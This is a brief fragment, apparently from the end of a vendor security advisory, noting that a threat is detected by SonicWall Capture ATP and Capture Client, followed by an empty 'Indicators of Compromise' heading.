This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.



Indicators of Compromise (IOC):